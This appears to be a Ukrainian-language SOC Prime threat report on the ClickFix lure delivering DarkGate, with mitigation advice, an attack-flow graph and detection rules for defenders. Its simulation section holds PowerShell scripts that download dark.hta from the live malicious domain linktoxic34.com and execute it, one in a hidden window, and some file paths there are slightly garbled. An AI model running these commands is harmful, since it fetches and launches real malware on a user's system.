SOC Prime Bias: Середній

16 Dec 2025 20:43
newspaper icon Point Wild

Дослідження ClickFix: шкідливе програмне забезпечення DarkGate

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Дослідження ClickFix: шкідливе програмне забезпечення DarkGate
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

Звіт окреслює метод соціальної інженерії під назвою ClickFix, який спонукає користувачів копіювати та виконувати команду PowerShell, яка потім завантажує шкідливий файл HTA. Цей файл HTA, у свою чергу, завантажує додаткові компоненти, включаючи скрипт AutoIt, який створює каталоги, завантажує файли й встановлює зв’язок C2. Діяльність приписується кампанії DarkGate і базується на обфускації base64 і маніпуляціях із буфером обміну, щоб уникнути простого виявлення.

Розслідування

Аналітики розкрили кілька шарів закодованого в base64 вмісту, вбудованого в підроблену сторінку сповіщення про розширення для браузера, і відновили команду PowerShell, відповідальну за отримання dark.hta з linktoxic34.com. Після виконання HTA розгортає виконуваний файл AutoIt (fckhffh.a3x), який запускає процедуру DES і стартує подальші навантаження. На перехопленій мережевій телеметрії видно трафік HTTP(S) до шкідливого домену, за яким слідує ланцюгова команда PowerShell.

Пом’якшення

Рекомендовані заходи захисту включають тренування користувачів для уникнення копіювання невідомих фрагментів коду, вимкнення діалогу Windows Run за допомогою групової політики та розгортання поведінкових антивірусних рішень. Проактивне блокування шкідливого домену та моніторинг аномальних виконань PowerShell може значно зменшити ризик зараження DarkGate.

Реагування

Якщо виявлено подію, пов’язану з ClickFix, ізолюйте уражений кінцевий вузол, зупиніть усі шкідливі процеси, видаліть артефакти HTA і AutoIt і проведіть судову експертизу всіх папок, створених під час вторгнення. Оновіть логіку виявлення, щоб позначати підозрілі схеми виконання PowerShell і HTA, і переконайтесь, що відповідний домен заблоковано в середовищі.

“graph TB %% Class Definitions classDef asset fill:#f0e68c classDef technique fill:#ffcc99 classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#e6e6fa classDef process fill:#ffdddd %% Nodes webpage_malicious[“<b>Актив</b> – Шкідлива веб-сторінка<br />Містить обфускацію PowerShell з кодуванням base64u2011 та реверсивним рядком”] class webpage_malicious asset tech_html_smuggling[“<b>Техніка</b> – <b>T1027.006</b> Прікриваючі файли або інформація: HTML-Проникнення<br />Схований PowerShell Base64 в HTML/JavaScript”] class tech_html_smuggling technique tech_stripped_payloads[“<b>Техніка</b> – <b>T1027.008</b> Прікриваючі файли або інформація: Вирізані навантаження<br />Вкладені рядки base64 приховують PowerShell”] class tech_stripped_payloads technique action_user_click[“<b>Дія</b> – <b>T1204.001</b> Виконання користувача: Шкідливе посилання<br />Жертва натискає кнопку “How to fix””] class action_user_click action tech_clipboard_data[“<b>Техніка</b> – <b>T1115</b> Дані буфера обміну<br />Скрипт копіює команду PowerShell в буфер обміну”] class tech_clipboard_data technique action_copy_paste[“<b>Дія</b> – <b>T1204.004</b> Виконання користувача: Шкідливе копіювання та вставка<br />Користувач вставляє команду через Win+R та Ctrl+V”] class action_copy_paste action tech_powershell[“<b>Техніка</b> – <b>T1059.001</b> Інтерпретатор команд і скриптів: PowerShell<br />Виконує завантажену команду”] class tech_powershell technique process_powershell[“<b>Процес</b> – PowerShell”] class process_powershell process tech_web_protocol[“<b>Техніка</b> – <b>T1071.001</b> Протокол прикладного рівня: Веб-протоколи<br />Завантажує HTA через HTTP(S)”] class tech_web_protocol technique file_dark_hta[“<b>Файл</b> – dark.hta<br />HTA-завантаження з linktoxic34.com”] class file_dark_hta file tech_mshta[“<b>Техніка</b> – <b>T1218.005</b> Виконання системного проксі-файла: Mshta<br />Виконує HTA через mshta.exe”] class tech_mshta technique process_mshta[“<b>Процес</b> – mshta.exe”] class process_mshta process tech_lateral_transfer[“<b>Техніка</b> – <b>T1570</b> Бічна передача інструменту<br />HTA призводить до одержання ZIP-архіву з додатковими двійковими файлами”] class tech_lateral_transfer technique file_payload_zip[“<b>Файл</b> – payload.zip<br />Містить сценарій AutoIt та двійкові файли”] class file_payload_zip file tech_masquerading[“<b>Техніка</b> – <b>T1036</b> Маскування<br />HTA представлено як легітимна утиліта вирішення проблем”] class tech_masquerading technique tech_rtl_override[“<b>Техніка</b> – <b>T1036.002</b> Маскування: Перевірка справа наліво<br />Кодування реверсного рядка для уникнення виявлення”] class tech_rtl_override technique tool_darkgate[“<b>Інструмент</b> – DarkGate RAT<br />Надає постійний віддалений доступ”] class tool_darkgate tool tech_remote_access[“<b>Техніка</b> – <b>T1219</b> Інструменти віддаленого доступу<br />Встановлює C2-комунікації”] class tech_remote_access technique %% Connections webpage_malicious u002du002d>|використовує| tech_html_smuggling webpage_malicious u002du002d>|використовує| tech_stripped_payloads webpage_malicious u002du002d>|тригерує| action_user_click action_user_click u002du002d>|призводить до| tech_clipboard_data tech_clipboard_data u002du002d>|дозволяє| action_copy_paste action_copy_paste u002du002d>|виконує| tech_powershell tech_powershell u002du002d>|запускає| process_powershell process_powershell u002du002d>|завантажує| tech_web_protocol tech_web_protocol u002du002d>|отримує| file_dark_hta file_dark_hta u002du002d>|виконується| tech_mshta tech_mshta u002du002d>|запускає| process_mshta process_mshta u002du002d>|випадає| tech_lateral_transfer tech_lateral_transfer u002du002d>|створює| file_payload_zip file_dark_hta u002du002d>|маскується як| tech_masquerading file_dark_hta u002du002d>|обфускує з| tech_rtl_override file_payload_zip u002du002d>|містить| tool_darkgate tool_darkgate u002du002d>|використовує| tech_remote_access “

Потік Атаки

Виявлення

Підозріла поведінка ухилення від захисту LOLBAS MSHTA шляхом виявлення пов’язаних команд (через process_creation)

Команда SOC Prime
16 грудня 2025 р.

Переглянути

Підозрілі строки Powershell (через powershell)

Команда SOC Prime
16 грудня 2025 р.

Переглянути

Файл AutoIT був виконаний з незвичайного розташування (через process_creation)

Команда SOC Prime
16 грудня 2025 р.

Переглянути

Підозрілі файли в загальному профілю користувача (через file_event)

Команда SOC Prime
16 грудня 2025 р.

Переглянути

Підозріле виконання з загального профілю користувача (через process_creation)

Команда SOC Prime
16 грудня 2025 р.

Переглянути

Виклик підозрілих методів .NET з Powershell (через powershell)

Команда SOC Prime
16 грудня 2025 р.

Переглянути

IOCs (HashSha256) для виявлення: ClickFix: DarkGate

Правила SOC Prime AI
16 грудня 2025 р.

Переглянути

Виявлення шкідливої активності PowerShell для завантаження файлу HTA [Мережеве підключення Windows]

Правила SOC Prime AI
16 грудня 2025 р.

Переглянути

Шкідлива активність PowerShell, що включає виконання HTA та маніпуляції з буфером обміну [Windows Powershell]

Правила SOC Prime AI
16 грудня 2025 р.

Переглянути

Виконання симуляції

Передумова: Перевірка телеметрії та основного рівня повинна бути пройдена.

Підстава: У цьому розділі детально описується точне виконання техніки супротивника (TTP), призначене для спрацювання правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати визначені TTP і мають на меті генерувати точну телеметрію, очікувану логікою виявлення.

  • Наратив атаки та команди:
    Атакуючий, який отримав доступ із низькими привілеями на скомпрометованій Windows-системі, бажає завантажити шкідливий HTA-навантаження, що використовується в кампанії ClickFix. Щоб залишатися ненав’язливим, атакуючий використовує PowerShell— вбудований інструмент Windows — тож зовнішні двійкові файли не вводяться. Команда виконується безпосередньо в консолі (або через заплановане завдання) і містить точну URL-адресу, яку спостерігає правило. Завантаження зберігається в каталозі користувача %TEMP% а потім виконується через Start-Process.

    $url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
$out = "$env:TEMPdark.hta"
Invoke-WebRequest -Uri $url -OutFile $out
Start-Process -FilePath $out

  • Сценарій регресійного тестування: (самодостатній, відтворює вищезазначені кроки)

    # Симуляція завантаження ClickFix HTA – спрацьовує Sigma-правило
$maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
$destPath = "$env:TEMPdark.hta"

try {
    Write-Host "[*] Завантажується шкідливе HTA payload..."
    Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing
    Write-Host "[+] Завантаження завершено. Виконую payload..."
    Start-Process -FilePath $destPath -WindowStyle Hidden
} catch {
    Write-Error "Завантаження або виконання не вдалося: $_"
}

  • Команди очищення: (видаляє завантажений HTA і всі запущені примірники)

    # Видалення файлу HTA та завершення всіх процесів, які можуть бути запущені з HTA (загальний приклад)
$htaPath = "$env:TEMPdark.hta"
if (Test-Path $htaPath) {
    Remove-Item $htaPath -Force
    Write-Host "[*] Файл HTA видалено."
}
# Знищення всіх процесів, які можуть бути запущені з HTA (загальний приклад)
Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам почати і забезпечити негайну користь, заплануйте зустріч з експертами SOC Prime.

Приєднатися безкоштовно